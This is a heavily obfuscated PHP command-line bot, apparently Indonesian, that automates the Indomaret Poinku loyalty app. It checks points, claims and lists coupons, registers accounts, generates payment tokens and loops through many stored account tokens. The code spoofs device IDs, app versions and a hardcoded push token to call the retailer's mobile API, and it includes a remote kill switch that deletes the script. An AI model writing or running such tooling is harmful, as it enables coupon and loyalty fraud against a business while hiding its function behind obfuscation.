  Tq1Up:
  htQmu:
  goto M4ZDE;
  O0hxR:
  n5UbT:
  goto ITp7p;
  Jaank:
  k9jad:
  goto PuPZU;
  VZdN4:
  $ZNU2M = @$owfHy["\144\141\164\x61"]["\x63\x6f\x6e\x74\x65\156\164"][$D2zwh]["\143\x6f\165\160\x6f\x6e\116\141\155\x65"];
  goto MTZD5;
  r0iPg:
  VRnC_:
  goto UUQep;
  FI_gp:
  die;
  goto Yekgm;
  XgYhk:
  echo "\12";
  goto yOKeR;
  Nb0X4:
  echo $yy9BI . "\56\x20";
  goto ptOzD;
  VXKB5:
  echo @zm6Ic("\156\x65\166\x79", "\x20\174\x20\123\x63\x72\x69\160\164\40\111\x44\x4d\40\x43\145\x6b\40\120\x6f\151\156\12");
  goto Xpi4j;
  A3oaD:
  sleep(2);
  goto UWw0n;
  oEbC2:
  $owfHy = json_decode($XTuz1, true);
  goto UHHXN;
  QIpsV:
  $v1ZMX = str_replace("\xd", '', $wPFxB);
  goto YISeP;
  pWv96:
  $J0Fkh = @$owfHy["\144\x61\x74\141"]["\143\157\x6e\x74\x65\x6e\x74"][$dQ8Tp]["\161\x75\x6f\164\x61"];
  goto AwDD1;
  ADYHk:
  $mlMLt = $obc_G;
  goto w3dkM;
  uVfSY:
  die;
  goto F21Gw;
  vT103:
  $eqo_P = @file_get_contents("\142\145\141\164");
  goto usfrB;
  OIj3S:
  y1Iam:
  goto kMlqh;
  xZqqd:
  echo @ZM6Ic("\x6e\x65\x76\x79", $YXsOG);
  goto s4WP6;
  FK02O:
  $zvt88 = $IKJzx;
  goto JXPEQ;
  TqaEk:
  echo "\xa";
  goto YNjDv;
  cT7sZ:
  echo "\xa";
  goto KRL_Q;
  VrZaE:
  $mYT0v["\162\x65\163\160\157\156"] = json_decode($zy8D_, true);
  goto VtQl6;
  sHluB:
  eOkr8:
  goto D0i6Z;
  sThR9:
  cXIKR:
  goto ft7vH;
  YT9J8:
  JKU8P:
  goto XJjoI;
  iMEyj:
  echo @zM6Ic("\x6e\x65\166\171", $YXsOG);
  goto ZzJEY;
  CHNi6:
  echo @ZM6IC("\x79\145\x6c\154\157\167", "\x4e\x61\155\141\40\113\x75\160\157\156\156\x79\141\40\x20\40\40\72\x20");
  goto RNAEK;
  OvZkE:
  $wZnHP = $lPULW[$jTEU0];
  goto ijTty;
  Ecn2N:
  $yy9BI;
  goto ZezGD;
  eyI9u:
  $lPULW = $m0f8X;
  goto e8lpL;
  Xo2nr:
  $wDisp = "\173\x22\x75\x73\x65\162\x49\144\42\72" . $R_bYC . "\x2c\42\144\x65\x76\151\143\145\124\x79\x70\145\x22\x3a\42\60\61\42\x2c\42\144\x65\166\151\143\145\111\x64\x22\72\x22" . $aY0el . "\42\54\x22\x66\143\155\124\157\153\x65\156\42\72\42" . $WYrgv . "\72\x41\x50\x41\71\x31\142\106\x74\71\127\x75\x4f\144\156\x59\151\164\x5f\150\117\166\x71\155\x48\103\x32\165\x4d\107\151\x69\x43\167\x70\x5f\x75\70\112\x67\117\60\153\102\x33\163\x67\131\x51\116\x78\157\x57\x71\117\65\67\x45\105\131\160\x41\101\101\x56\x6a\152\104\x43\x59\x38\x43\64\152\55\x65\120\x48\x43\x59\x47\x36\115\x67\x63\x67\x38\65\122\145\150\116\x4f\x33\63\x78\x74\x31\122\x52\x50\66\104\x49\x50\126\x75\x33\66\161\x6b\x46\x48\x64\x6b\146\121\71\x47\x65\124\x44\x48\x38\x57\106\162\123\x61\151\151\x42\x7a\153\145\x5a\107\155\71\167\160\x22\x7d";
  goto U_2QW;
  k_cPh:
  $m5BZY = gggR_("\150\x74\164\x70\163\x3a\57\x2f\141\163\x69\x61\55\x73\157\x75\x74\150\145\141\x73\x74\x32\55\151\x64\155\x2d\x63\x6f\162\160\55\x70\162\144\x2e\x63\x6c\x6f\165\x64\146\165\x6e\143\x74\151\x6f\156\x73\x2e\x6e\145\x74\57\151\144\155\x61\160\160\x73\137\164\x72\x61\143\153\x65\162\137\147\x61\164\145\x77\x61\171", $wDisp);
  goto am0nY;
  Gg0l9:
  echo "\xa";
  goto S9BGT;
  JBC35:
  goto bvf0h;
  goto QMeBt;
  QmHCB:
  goto i5Ayp;
  goto TAFxv;
  xW7i4:
  $kCT0W = str_replace("\55", '', $cod3H);
  goto LE6IR;
  Wo0m2:
  $Ipl73 = @$owfHy["\144\x61\164\x61"][0]["\x64\151\163\x74\x72\x69\143\x74"]["\160\162\157\166\151\156\143\x65"];
  goto SFBUG;
  z1S5b:
  hc1uy:
  goto t1_y0;
  kPhu0:
  $jTEU0++;
  goto UXn5u;
  NTLhy:
  $jTEU0++;
  goto teyF2;
  fITcJ:
  echo @Zm6Ic("\x6e\145\166\x79", $kp_uF);
  goto sVbAt;
  Aa3T3:
  NYs__:
  goto i5Kia;
  eqyZ2:
  echo "\12";
  goto IVGka;
  gGSXs:
  if (!($cPDPt == 17)) {
    goto iwC6F;
  }
  goto rWTTh;
  zkBq9:
  echo @ZM6Ic("\156\145\166\171", $XDyMm);
  goto RrOSK;
  HWxH4:
  $M1ADy = @$Ap1KM["\x64\x61\x74\141"]["\x69\x64"];
  goto MY65q;
  cyzwh:
  $H1g60 = json_decode($yI7qh, true);
  goto fTiXw;
  UfbNl:
  echo @zM6iC("\162\x65\144", "\12\x7e\x7e\176\x7e\x7e\176\176\x7e\176\176\x7e\176\x7e\x7e\x7e\x7e\176\x7e\176\176\x7e\x7e\176\x7e\x7e\176\176\x7e\176\176\x7e\176\176\176\176\x7e\176\x7e\x7e\176\176\x7e\x7e\176\176\x7e\x7e\x7e\xa");
  goto v1Kc0;
  JgUFe:
  echo @zm6IC("\x6e\145\x76\x79", $ZNU2M);
  goto P1XjP;
  Rnq3x:
  echo @ZM6IC("\x72\x65\x64", "\xa\176\176\x7e\176\x7e\176\176\x7e\176\x7e\176\x7e\176\x7e\176\176\176\176\176\x7e\176\x7e\x7e\x7e\x7e\176\176\176\x7e\x7e\176\176\176\x7e\176\176\176\x7e\x7e\176\x7e\176\x7e\x7e\x7e\x7e\176\176\xa");
  goto okpAe;
  HpGT7:
  if (!($jTEU0 < $S8W9D)) {
    goto IHjkB;
  }
  goto wlYZy;
  iHrm4:
  $U_EVz = @$owfHy["\x64\141\x74\141"][0]["\163\x75\142\x44\151\x73\x74\162\151\143\x74"]["\163\165\x62\x44\x69\163\164\x72\151\143\164\x43\157\x64\x65"];
  goto QxZ8E;
  G0hLP:
  $O8Mmj = xozb4(array("\72"), $jze6k)[2];
  goto LtRQg;
  b944Q:
  echo @zM6ic("\156\145\x76\171", $ZqwwP);
  goto ERz4c;
  jk3HC:
  $U0YgX = str_replace("\xd", '', $zcN5u);
  goto DgJtQ;
  ptjzv:
  $QG8my = $qeP83;
  goto lt5C6;
  vSSuK:
  eM0mo:
  goto iaa8j;
  IfjVc:
  nNgh2:
  goto F2SO3;
  p61aQ:
  $qtgR3++;
  goto nOgbN;
  Mt8og:
  $b2ucB = @$owfHy["\x64\141\164\141"][$qtgR3]["\x63\x69\x74\x79\x4e\141\155\x65"];
  goto DSkp1;
  WQtAk:
  $v1ZMX = str_replace("\xd", '', $wPFxB);
  goto eI2DI;
  OMVIC:
  die;
  goto YMWoX;
  VhWc9:
  echo @ZM6ic("\x6e\145\166\x79", "\40\x53\x45\115\x4f\107\x41\40\114\117\102\101\116\107\x20\x50\101\x4e\124\101\x54\40\116\x59\x41\x20\102\x49\123\x55\x4c\101\x4e\41\41\x21\x21\41\x20\xa");
  goto UfDTf;
  cSFfS:
  echo @zm6IC("\171\x65\154\154\x6f\167", "\x49\104\x20\156\171\141\x3a\40");
  goto TcCw8;
  m2PK0:
  $yPeiy = @$H1g60["\162\x65\x66\x72\145\x73\150\x54\157\153\x65\x6e"];
  goto KS3CE;
  xn_1c:
  curl_close($C6npe);
  goto uNQ8P;
  Aed5e:
  if (!($zcN5u == '')) {
    goto dVFa2;
  }
  goto DvkOx;
  VrunV:
  $wZnHP = $lPULW[$jTEU0];
  goto r7FiT;
  yrVV7:
  echo @Zm6Ic("\171\x65\154\x6c\x6f\x77", "\102\x75\151\x6c\x64\x20\x42\x79\x20\106\105\122\x44\x59\x20\122\101\x4d\101\x44\x48\101\x4e\x20");
  goto qNcWT;
  QScqr:
  $basER = @$lImQC["\144\x61\x74\x61"]["\143\x6f\156\164\x65\156\x74"][0]["\163\x74\141\164\x75\163"];
  goto LVnAQ;
  Xt3c5:
  $Bz8Et = @$owfHy["\x64\x61\164\141"][0]["\160\x6f\163\164\141\x6c\x43\157\x64\x65"]["\160\x6f\163\164\x61\154\x43\x6f\144\145"];
  goto SGE2l;
  EzY9G:
  echo "\x44\x65\x6c\x65\164\145\x64\40{$xp_1p}\40\x20";
  goto kXsPH;
  dmrOw:
  $ZNU2M = @$Ap1KM["\144\x61\x74\141"]["\x63\x6f\165\x70\x6f\x6e\116\x61\x6d\145"];
  goto vEGl4;
  SFBUG:
  $K4tCB = @$owfHy["\144\141\164\141"][0]["\144\151\163\164\162\151\x63\164"]["\160\162\x6f\x76\x69\x6e\x63\145\x4e\141\x6d\145"];
  goto aQS5l;
  mx2GA:
  echo @zM6iC("\x72\x65\x64", "\x59\x61\150\56\x2e\x2e\40\101\x79\x61\155\40\x4e\x79\x61\x20\x47\x61\x20\x41\x64\x61\40\x2c\x20\x41\153\x61\x6e\x20\104\x69\40\x43\145\153\x20\113\x65\x6d\142\x61\154\151\x2e\x2e\56");
  goto HeT1k;
  q9l5G:
  NzAWp:
  goto r4NLu;
  zd5Ut:
  echo @zm6iC("\147\x72\x65\x65\x6e", "\120\151\154\151\x68\40\72\x20");
  goto DCe2w;
  ZSznK:
  echo $BcbF3;
  goto kqX3g;
  BySUD:
  $m0f8X = explode("\12", @file_get_contents("\155\x79\x74\157\153\145\x6e"));
  goto zFklN;
  XC7On:
  print_r($zcN5u);
  goto pH0u8;
  yeGkX:
  $tqWr2 = $zvt88[$yy9BI];
  goto KcLeH;
  MoCCw:
  $ruc3h = ["\130\55\x52\145\161\165\x65\x73\x74\x65\144\x2d\127\151\164\x68\72\x20\x58\x4d\114\x48\164\x74\x70\x52\145\x71\165\145\x73\x74", "\x55\x73\x65\x72\55\x41\147\x65\x6e\164\x3a\40\x4d\x6f\x7a\151\154\x6c\141\57\x35\x2e\60\x20\x28\130\61\x31\73\x20\114\151\156\x75\170\40\x78\x38\66\137\x36\64\51\x20\101\160\160\x6c\145\x57\145\x62\x4b\x69\x74\57\x35\x33\x37\56\x33\x36\40\50\113\110\124\115\x4c\x2c\40\x6c\151\153\145\40\x47\145\x63\x6b\157\x29\40\103\150\x72\157\x6d\145\57\65\61\x2e\60\x2e\62\x37\x30\x34\x2e\x38\64\x20\123\141\x66\141\162\x69\x2f\65\63\67\x2e\63\x36"];
  goto TXqhc;
  gNu5p:
  $m0f8X = explode("\12", @file_get_contents("\155\171\x74\157\153\x65\x6e"));
  goto FpT14;
  liGR7:
  if (!unlink($xp_1p)) {
    goto hAy4Q;
  }
  goto HdRao;
  mZygY:
  echo "\xa";
  goto FR3s4;
  Al7wy:
  echo @Zm6IC("\171\x65\x6c\x6c\x6f\167", "\120\x65\x73\x61\x6e\x20\x20\x3a\40");
  goto sJ4Cl;
  aKLgU:
  echo "\xa";
  goto LCYe1;
  hwlm8:
  fblk0:
  goto Uv0u9;
  gkcvz:
  echo @Zm6iC("\171\x65\154\154\x6f\167", "\40\55\x20\123\145\155\x6f\147\x61\40\x43\x75\x61\x6e\x20\136\x5e\x20\124\145\x72\151\x6d\x61\x20\x4b\141\163\151\150\x20\x54\x65\x6c\141\x68\40\x4d\x65\x6d\142\x65\x6c\151\x20\x53\143\162\151\x70\164\x20\111\156\151\12");
  goto vPKzt;
  vaWNC:
  echo "\12";
  goto vuGa0;
  RG7P9:
  echo @Zm6iC("\171\x65\x6c\154\157\x77", "\40\x20\x20\40\40\x20\x20\40\131\x41\116\107\40\116\x59\105\x42\x41\122\111\116\x20\123\103\122\111\x50\x54\x20\x49\x4e\111\x20\xa");
  goto y23qq;
  Q40cO:
  v8iSe:
  goto e2U0W;
  dsC4G:
  $nPb0z = json_decode($Jk9cx, true);
  goto ElGmQ;
  N3_fB:
  if (!($zcN5u == '')) {
    goto Y1LJ5;
  }
  goto TRBQ4;
  T9KaD:
  $wd9cN = date("\x64\x2d\155\x2d\131\40\174\x20\x48\72\151\x3a\x73");
  goto haa26;
  c3hCT:
  $ZqwwP = @$owfHy["\144\x61\x74\141"][$dQ8Tp]["\x6b\145\171\x77\157\162\144"];
  goto sWeiZ;
  LZi1O:
  $VJtH7 = @$owfHy["\144\141\164\141"]["\x63\157\156\164\x65\156\x74"][$dQ8Tp]["\160\x6f\x69\156\x74\x45\170\x63\150\141\156\147\145\x49\144"];
  goto J5SJE;
  PltW2:
  echo "\12";
  goto SwrwN;
  SVWfL:
  echo @zm6ic("\x79\145\154\x6c\157\167", "\40\61\62\40\56\x20\x43\x6c\x61\x69\x6d\x20\113\x75\160\x6f\156\12");
  goto t2UQK;
  qAfot:
  $efQM2 = count($QRhbE) - 1;
  goto fcX90;
  gECUy:
  echo "\12";
  goto Wmiu1;
  P0Tqd:
  echo "\12";
  goto li7p9;
  sJ4Cl:
  echo @zM6iC("\x6e\145\166\171", $ABmxY);
  goto WC5FU;
  RS0jB:
  $wDisp = "\x7b\42\x64\x61\164\141\42\x3a\133\173\42\141\x70\160\154\151\143\x61\x74\x69\157\x6e\x22\72\x7b\x22\x61\160\x70\137\166\145\162\x73\151\157\156\x22\72\x22\x33\x2e\61\63\56\x30\42\54\42\144\x65\166\151\143\x65\x5f\143\x6c\x61\x73\163\x22\72\x22\120\x68\x6f\156\x65\x22\54\42\144\x65\x76\x69\x63\x65\x5f\x66\141\x6d\x69\x6c\171\x22\x3a\42" . $GOXkU . "\42\54\x22\x64\x65\x76\151\x63\145\137\x69\x64\42\x3a\42" . $aY0el . "\42\54\x22\157\163\137\156\x61\155\145\42\x3a\42\x41\156\x64\162\x6f\151\x64\x20\120\42\x2c\42\157\163\137\166\x65\162\x73\151\157\x6e\42\x3a\x22\101\x6e\144\x72\157\151\144\40\x39\x22\175\54\x22\x63\x6f\162\x65\42\x3a\x7b\x22\145\166\145\156\x74\x5f\x6c\141\x62\x65\154\x22\x3a\x22\154\x6f\147\x69\x6e\42\x2c\42\x65\x76\x65\156\164\x5f\x6e\x61\x6d\x65\x22\x3a\x22\145\x76\x65\x6e\x74\x5f\163\165\x62\155\x69\163\163\x69\157\156\x22\54\42\x65\166\x65\x6e\x74\137\163\164\141\x74\x75\x73\x22\x3a\42\163\165\143\143\145\163\x73\42\x2c\42\145\166\x65\156\x74\137\x74\151\x6d\145\163\x74\141\x6d\x70\42\x3a" . $nb9cm . "\175\54\42\155\x61\162\153\145\164\x69\x6e\x67\42\x3a\173\42\x75\164\155\137\x72\141\x77\42\x3a\42\x75\164\x6d\137\x73\x6f\165\162\x63\x65\75\147\x6f\157\147\154\x65\x2d\x70\x6c\141\171\46\165\x74\155\x5f\x6d\145\144\x69\165\x6d\x3d\x6f\162\147\141\x6e\151\143\42\x7d\x2c\x22\x75\x73\x65\x72\42\72\173\x22\x73\145\163\x73\151\x6f\156\x5f\151\144\x22\x3a\x22" . $MXjqh . "\42\54\x22\x75\163\145\x72\137\151\160\x5f\141\x64\144\x72\145\163\163\x22\72\x22\61\x32\x37\56\60\x2e\x30\56\61\x22\175\x7d\135\175";
  goto hYPdD;
  FzzRT:
  $owfHy = json_decode($XTuz1, true);
  goto mtJDK;
  TXqhc:
  $C6npe = curl_init();
  goto aHo28;
  mHVo8:
  goto rHN94;
  goto soYFB;
  eYvyG:
  if ($eAEyy == "\104\151\x73\153\x6f\156\40\122\160\40\x32\x35\x2e\60\60\x30\40\113\x6c\x69\x6b\x20\111\156\x64\157\x6d\x61\162\145\x74") {
    goto yrh1H;
  }
  goto rmeAQ;
  q3S0N:
  goto GsrX0;
  goto OWCKV;
  EGbwm:
  echo @zm6iC("\x72\x65\x64", "\x59\141\x68\x2e\x2e\56\x20\x41\171\x61\x6d\40\116\x79\x61\x20\107\141\x20\101\144\x61\40\54\40\101\153\141\156\x20\104\151\x20\103\x65\153\x20\113\x65\155\x62\x61\x6c\151\x2e\x2e\x2e");
  goto D1f2D;
  t0FCe:
  SCsGz:
  goto NHckK;
  rKNAf:
  $upOL9 = g8PF2("\150\164\164\160\163\72\57\x2f\145\144\x74\x73\141\x70\x70\x2e\151\x6e\144\157\x6d\141\162\145\x74\x70\157\x69\156\x6b\165\56\x63\x6f\155\57\154\157\x79\141\154\x74\x79\x2f\141\x70\x69\x78\x2d\x31\65\60\62\x2d\141\160\x69\x2f\x6d\x6f\x62\151\154\x65\x2f\x70\x6f\x69\156\x74\163\57\155\145", $aY0el, $GOXkU, $mlMLt);
  goto Cu1Rm;
  RTqsK:
  echo "\12";
  goto tcJMt;
  QFrmT:
  echo "\12";
  goto p3S5N;
  b5EpG:
  $e52KH = @$lImQC["\144\x61\x74\141"]["\x63\157\156\164\145\156\x74"][16]["\x63\x6f\165\x70\x6f\x6e\x43\157\144\145"];
  goto qr3SL;
  D6NeB:
  goto Q9w_S;
  goto LijEy;
  bCOU4:
  echo @zm6IC("\x6e\x65\166\x79", "\123\x6f\162\162\171\x2c\40\x54\x68\151\163\x20\123\x63\x72\151\x70\x74\x20\110\x61\x73\x20\x42\x65\x65\x6e\40\122\x65\155\x6f\166\x65\144\40\102\171\40\x54\150\145\x20\117\167\x6e\x65\x72\x21\x21");
  goto TDRWg;
  r44f6:
  echo @zm6iC("\147\162\x65\x65\156", "\x5b\x31\x36\x5d\x20{$PKr5B}\40\12\x20\x20\x20\40\x3e\x20{$kGhP3}\x20\12\12");
  goto X_5QB;
  xuF8a:
  $D2zwh;
  goto THW2n;
  oyg3B:
  $mlMLt = $obc_G;
  goto yGUlS;
  Bneb2:
  echo @zM6IC("\x6e\145\x76\x79", "\123\157\162\x72\171\x2c\40\x54\x68\151\163\40\x53\x63\x72\x69\x70\x74\x20\x48\141\163\40\x42\x65\145\x6e\40\x52\145\x6d\157\166\145\x64\40\x42\171\x20\x54\x68\145\40\117\167\156\x65\x72\x21\41");
  goto oCnIM;
  ePkw1:
  $aY0el = $jlHkA;
  goto fw4lA;
  kfZ6v:
  $aY0el = $v1ZMX;
  goto KzC24;
  LW72A:
  die;
  goto L0p_i;
  a0kRQ:
  goto vsi0y;
  goto pRS6N;
  jYjqX:
  $efQM2 = count($QRhbE) - 1;
  goto ZCeM4;
  HGduE:
  curl_setopt($C6npe, CURLOPT_POSTFIELDS, $z5CDs);
  goto jibTK;
  VYgN7:
  $wlJRC = xOzB4(array("\174"), $wZnHP)[1];
  goto CotX3;
  Ys25d:
  $ofEkP = a0MYl("\x68\x74\x74\160\x73\x3a\x2f\57\x69\x6e\144\x6f\155\141\x72\x65\164\x70\157\151\156\153\x75\56\143\x6f\x6d\57\141\x70\x69\57\x67\x61\155\151\146\x69\x63\141\x74\151\157\156\x52\145\x61\x64\x79", $wDisp, $N0ol8, $M1ADy, $aY0el, $GOXkU, $mlMLt);
  goto S9Ofg;
  iqD2p:
  w88np:
  goto e4xvp;
  lt5C6:
  echo @ZM6iC("\x6e\x65\166\x79", "\101\153\x75\x6e\40\x4b\x65\x20\x20\x20\40\40\x20\x20\40\x3a\40");
  goto h560o;
  nODjW:
  die;
  goto uX1ga;
  n_ddg:
  $m0f8X = explode("\xa", @file_get_contents("\x6d\x79\164\157\x6b\x65\x6e"));
  goto AMMpd;
  yjcW3:
  $sONlZ = str_replace("\xd", '', $rERzL);
  goto chsNn;
  pqL5O:
  ptn8D:
  goto gdThu;
  JlfKN:
  echo "\12";
  goto SriS5;
  ZGdOo:
  goto wCiUR;
  goto ulLqL;
  XxnqS:
  $m5BZY = ggGR_("\x68\164\164\160\x73\72\x2f\x2f\141\163\x69\x61\x2d\x73\x6f\x75\x74\x68\145\141\163\164\62\55\x69\144\x6d\55\143\x6f\162\x70\55\x70\162\x64\56\143\154\x6f\165\144\146\x75\x6e\143\x74\x69\157\156\x73\x2e\156\x65\x74\x2f\151\x64\155\x61\x70\x70\x73\137\x74\x72\x61\x63\153\x65\162\x5f\x67\141\164\145\x77\x61\x79", $wDisp);
  goto QxYhI;
  aPAP6:
  goto WfXbO;
  goto OvB3v;
  rWTTh:
  echo @zm6Ic("\x72\x65\x64", "\xa\176\176\176\176\x7e\176\x7e\x7e\176\176\x7e\x7e\176\x7e\x7e\x7e\176\176\176\x7e\x7e\x7e\x7e\176\176\x7e\x7e\176\176\176\x7e\176\176\176\x7e\176\176\x7e\176\x7e\176\176\x7e\x7e\x7e\x7e\176\x7e\xa");
  goto ARsDv;
  t0TRa:
  die;
  goto e8gJe;
  WpQfH:
  echo "\xa";
  goto yCk2k;
  zayXM:
  $U0YgX = str_replace("\xd", '', $zcN5u);
  goto pT_BP;
  GZbpD:
  echo @Zm6ic("\x79\145\154\x6c\x6f\167", "\x4b\x6f\x64\x65\x20\x4b\x75\160\x6f\x6e\x6e\x79\x61\40\40\40\x20\72\40");
  goto z8qyV;
  hDDi0:
  echo @Zm6Ic("\x79\x65\x6c\x6c\157\167", "\x20\64\40\x20\x2e\40\122\x65\x67\x69\x73\x74\x65\x72\x20\x50\x6f\151\156\153\165\xa");
  goto Pjpiq;
  OWHjB:
  echo @zm6IC("\156\145\x76\171", $ABmxY);
  goto Tty61;
  s24Xx:
  $aY0el = $v1ZMX;
  goto RhwLr;
  PzxHu:
  $wDisp = "\x7b\42\160\x68\157\x6e\x65\x4e\x75\x6d\x62\x65\x72\42\72\42" . $zn5zd . "\42\54\x22\x64\145\166\151\143\145\x49\x64\42\x3a\x22" . $aY0el . "\42\x7d";
  goto D6ZaQ;
  oHvEu:
  die;
  goto AKHCV;
  u7ReR:
  $xzAuu = @$owfHy["\144\x61\164\x61"][0]["\163\x75\x62\x44\x69\163\x74\x72\x69\x63\x74"]["\166\x61\x6c\x75\145"];
  goto e5JB2;
  Vsuo7:
  echo @zM6ic("\160\x75\x72\x70\154\145", "\x4d\145\155\142\145\x72\x20\x49\x44\x20\72\x20");
  goto q6e41;
  MlxLs:
  $SR3ui = @$cQFRW["\x64\141\164\141"]["\x63\x6f\x75\160\157\156\x43\157\144\x65"];
  goto qa6Zn;
  fp_Tv:
  $zn5zd = substr_replace($O8Mmj, "\60", 0, 2);
  goto CeZ6r;
  d2zLL:
  $hGkCN = trim(fgets(STDIN));
  goto vgbrR;
  v4487:
  $wDisp = "\x7b\42\x64\x61\x74\x61\x22\72\x5b\x7b\42\x61\160\160\x6c\x69\143\x61\164\151\x6f\156\42\72\x7b\42\x61\x70\x70\137\166\x65\162\x73\151\x6f\156\42\72\42\63\56\x31\63\x2e\x30\x22\x2c\x22\x64\x65\166\x69\143\x65\x5f\143\x6c\141\163\x73\x22\72\x22\120\150\157\156\x65\42\x2c\42\144\x65\x76\151\143\145\x5f\146\141\x6d\151\154\171\42\x3a\42" . $GOXkU . "\42\54\x22\x64\145\x76\151\x63\145\137\x69\x64\42\x3a\x22" . $aY0el . "\42\54\42\157\163\x5f\156\x61\x6d\x65\x22\72\x22\x41\156\144\x72\157\x69\x64\40\120\42\54\42\157\x73\137\x76\x65\162\163\151\157\x6e\42\x3a\x22\101\156\x64\x72\157\151\x64\x20\71\42\x7d\x2c\x22\143\x6f\x72\145\42\72\173\x22\x65\x76\x65\x6e\164\x5f\x6c\141\142\x65\x6c\42\x3a\x22\x6c\x6f\147\151\x6e\42\x2c\x22\145\x76\145\x6e\164\137\x6e\141\x6d\145\x22\x3a\x22\x65\166\145\156\164\137\x73\165\142\x6d\151\x73\163\151\157\156\42\x2c\x22\x65\166\x65\156\164\x5f\x73\164\x61\164\165\163\x22\72\x22\163\165\143\143\x65\x73\163\x22\x2c\x22\145\x76\145\x6e\x74\x5f\x74\151\155\x65\163\164\x61\x6d\x70\x22\72" . $nb9cm . "\x7d\x2c\42\155\141\162\153\x65\x74\151\x6e\147\x22\x3a\173\42\165\x74\x6d\x5f\x72\x61\x77\x22\x3a\x22\165\164\x6d\137\163\157\165\162\143\x65\x3d\x67\157\x6f\147\154\145\x2d\x70\154\x61\171\x26\x75\x74\x6d\x5f\155\x65\x64\151\x75\155\75\x6f\x72\147\x61\x6e\151\x63\x22\175\54\x22\165\x73\x65\162\x22\x3a\x7b\x22\163\x65\163\x73\x69\x6f\x6e\x5f\x69\144\x22\x3a\42" . $MXjqh . "\x22\54\42\165\x73\145\x72\137\151\x70\x5f\141\144\x64\x72\x65\x73\x73\42\x3a\x22\61\x32\67\56\60\x2e\60\56\x31\x22\175\175\135\175";
  goto BDxWd;
  OG9eF:
  echo @Zm6iC("\171\145\x6c\x6c\x6f\167", "\123\103\x41\x4e\x20\x42\101\x52\x43\117\104\105\40\x49\x4e\111\40\101\107\101\x52\x20\113\x41\123\111\x52\40\114\105\102\111\x48\x20\x4d\125\104\x41\x48\x2e\56");
  goto ot1CO;
  wEXqb:
  $KbHJf = rand(1000000, 9999999);
  goto E28sd;
  GxlNR:
  echo @zM6ic("\171\x65\x6c\154\x6f\x77", "\x42\x75\151\154\x64\x20\x42\171\x20\106\x45\122\104\x59\40\x52\101\115\x41\x44\110\101\x4e\x20");
  goto smKwr;
  G3zOO:
  $QRhbE = explode("\12", @file_get_contents("\x66\x6f\162\x63\x65\143\x6c\x6f\163\x65"));
  goto NKHpy;
  j6M7L:
  $Jk9cx = G8pF2("\x68\x74\164\160\x73\x3a\57\x2f\145\144\164\x73\x61\160\160\x2e\151\x6e\144\157\155\x61\x72\x65\x74\160\x6f\151\156\x6b\165\x2e\x63\x6f\x6d\x2f\154\x6f\171\141\154\164\x79\57\141\160\x69\x78\55\x31\x35\60\x32\x2d\x61\x70\151\x2f\x6d\x6f\x62\151\x6c\x65\57\162\145\x6d\x69\156\x64\x65\162\x73\x2f\155\145", $aY0el, $GOXkU, $mlMLt);
  goto F0uMw;
  Tj0tS:
  $wDisp = "\x7b\x22\x6b\145\171\x77\157\162\144\x22\72\42" . $ip0vw . "\x22\x7d";
  goto d18Bg;
  C826k:
  die;
  goto wHuxC;
  SPakz:
  echo "\xa";
  goto n7HcN;
  TlphE:
  $p4iky = @$Ap1KM["\144\141\x74\x61"]["\x6d\x65\x6d\x62\145\162\x49\x64"];
  goto Dydaf;
  csAPf:
  echo @zM6iC("\x79\x65\154\x6c\x6f\x77", "\116\x61\x6d\141\40\x42\x61\x72\141\x6e\147\40\x3a\x20");
  goto k3DWO;
  w_vuh:
  goto V7t6B;
  goto ezb0I;
  v8qnX:
  $lPULW = $m0f8X;
  goto b1QyZ;
  bI4nj:
  $UHj7C = G8PF2("\x68\164\164\x70\163\72\x2f\x2f\x65\144\164\163\141\x70\160\56\151\156\x64\157\x6d\141\x72\145\164\160\x6f\x69\156\x6b\x75\56\x63\x6f\x6d\57\x63\157\165\x70\157\156\57\x61\x70\151\x78\x2d\x31\65\x30\x32\x2d\141\x70\x69\57\x6d\x6f\x62\x69\154\145\57\x63\157\165\160\157\156\x73\77\165\x6e\x70\x61\147\x65\144\x3d\x74\x72\165\x65", $aY0el, $GOXkU, $mlMLt);
  goto xGjbC;
  aBtiv:
  $m5BZY = gggR_("\x68\x74\164\160\x73\x3a\x2f\57\141\163\151\x61\x2d\163\157\165\164\x68\145\x61\163\x74\x32\55\x69\144\155\x2d\143\157\x72\160\x2d\x70\x72\144\56\x63\154\157\x75\x64\146\165\x6e\x63\164\151\157\x6e\x73\56\x6e\145\164\57\151\x64\x6d\141\160\160\x73\x5f\x74\162\x61\143\153\x65\x72\x5f\147\x61\x74\145\x77\x61\x79", $wDisp);
  goto cMm4X;
  yoo1d:
  $jlHkA = str_replace("\55", '', $sOOnY);
  goto xjMrp;
  yB2Vl:
  echo @zM6IC("\171\x65\154\x6c\157\167", "\x20\x37\x20\x20\x2e\40\107\x65\156\145\x72\x61\164\x65\40\x54\x6f\x6b\x65\156\x20\120\x65\x6d\142\x61\x79\141\x72\141\x6e\12");
  goto snQTX;
  uiAfq:
  echo @ZM6IC("\162\x65\x64", "\xa\x7e\x7e\176\176\x7e\176\x7e\x7e\176\176\176\x7e\176\176\176\x7e\x7e\x7e\x7e\x7e\176\x7e\x7e\176\176\x7e\176\x7e\x7e\x7e\176\176\x7e\x7e\176\176\176\176\176\176\176\176\x7e\176\176\176\x7e\x7e\12");
  goto CC5qC;
  yHo5h:
  if (!($kp_uF == "\61")) {
    goto z3XBs;
  }
  goto ElxJu;
  Plsof:
  $S8W9D = trim(fgets(STDIN));
  goto cFW3Z;
  e8lpL:
  $wZnHP = $lPULW[$jTEU0];
  goto vRmvG;
  TDRWg:
  @unlink("\x70\157\x69\156\x68\160\56\x70\150\160");
  goto PwA2q;
  IRVRS:
  echo @Zm6iC("\x6e\x65\x76\x79", $XDyMm);
  goto pllF8;
  nRt6q:
  blHDG($ZNU2M . "\56\x74\x78\x74", $SR3ui);
  goto W3rdR;
  mHcF1:
  $XTuz1 = G1WxT("\x68\164\164\160\x73\x3a\57\57\145\144\164\x73\x61\x70\x70\x2e\x69\x6e\144\157\x6d\141\x72\145\x74\x70\x6f\x69\x6e\x6b\x75\x2e\x63\157\155\x2f\x63\165\163\x74\157\155\145\162\x2f\141\160\x69\x78\x2d\x31\x35\x30\x32\55\x61\160\x69\57\x6d\157\142\151\x6c\145\x2f\x63\165\163\164\157\x6d\x65\162\x2d\141\x64\144\x72\x65\163\x73", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto FzzRT;
  LhXhn:
  BINZC:
  goto WLUFd;
  SGE2l:
  $pugmZ = @$owfHy["\144\x61\x74\x61"][0]["\x70\157\163\x74\141\154\103\157\x64\145"]["\160\157\163\x74\x61\154\x43\157\x64\145\111\144"];
  goto v2L4I;
